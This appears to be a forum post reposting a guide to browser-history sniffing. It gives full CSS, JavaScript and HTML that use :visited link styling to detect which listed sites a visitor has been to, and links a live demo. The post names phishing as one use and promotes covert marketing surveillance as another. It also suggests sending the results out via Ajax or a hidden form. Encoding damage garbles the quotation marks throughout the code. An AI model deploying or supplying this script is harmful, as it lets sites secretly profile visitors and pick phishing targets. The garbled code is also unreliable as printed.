Hey guys, I don't really know which section this falls on, but I think this one is the best, since it can be important for online businesses and websites to know their visitor's browser history. Here it goes: This is a trick vulnerability I learnt about from a talk I went to by Rasmus Lerdorf called ‘Exploring The Broken Web’. He took delegates on a 30 minute whirlwind tour of security vulnurabilities on the internet, specifically what can be done with XSS combined with a bit of social engineering. He only briefly skimmed on an area that interested me. He exposed how a developer can check a user’s browser history, by just asking for it. The trick is to use a small (and very simple) JavaScript code along with some CSS to find out which websites a user has visited from a list you provide. Rasmus mentioned the script as something of use to phishers (they can find out which banks you bank online with and send you the appropriate phishing emails). I saw a less immoral use for it (although I won’t deny it’s still immoral): purely for marketing statistics. If I had a site selling t-shirts, like www.bensfunkytshirts.com I could use this script to find out if my visitors had also been to threadless, bustedtees and designbyhumans - or any other site. Here’s the CSS: <style type=â€text/cssâ€> <!– #links a {width: 0px; overflow: hidden;} #links div {margin: 0; padding: 0;} a {position: absolute;} a:visited {left: 1px;} //–> </style> Code (markup): Here’s the JavaScript: <script language=â€JavaScriptâ€> onload =function() { var links =document.getElementsByTagName(’a'); var visited =new Array(); for(i =0; i<links.length; i++) { if(links[i].offsetLeft==1) visited.push(links[i].id); } //reveal on page the results for(i =0; i<visited.length; i++) document.write(’You have been to ‘ + visited[i] + ‘<br />’); } </script> Code (markup): Finally, here’s the HTML: <body> <div id=â€linksâ€> <div><a id=â€Yahoo†href=â€http://www.yahoo.com/â€>.</a></div> <div><a id=â€Google†href=â€http://www.google.com/â€>.</a></div> <div><a id=â€BBC-News†href=â€http://news.bbc.co.uk/â€>.</a></div> <div><a id=â€SlashDot†href=â€http://slashdot.org/â€>.</a></div> </div> </body> Code (markup): I’ve put an example of the script working up here: http://www.hostengage.com.au/dev/historyInquisition/ If I were to use a simple piece of Ajax, or to stick the sites I know you’ve visited into a simple hidden form, I could easily learn far more about your browsing habits than you would want me to know. I didn't write this guide, btw. I found it here, and I thought it would be nice to share it with the rest. Of course, I edited it so it looks good on the forum. Cheers!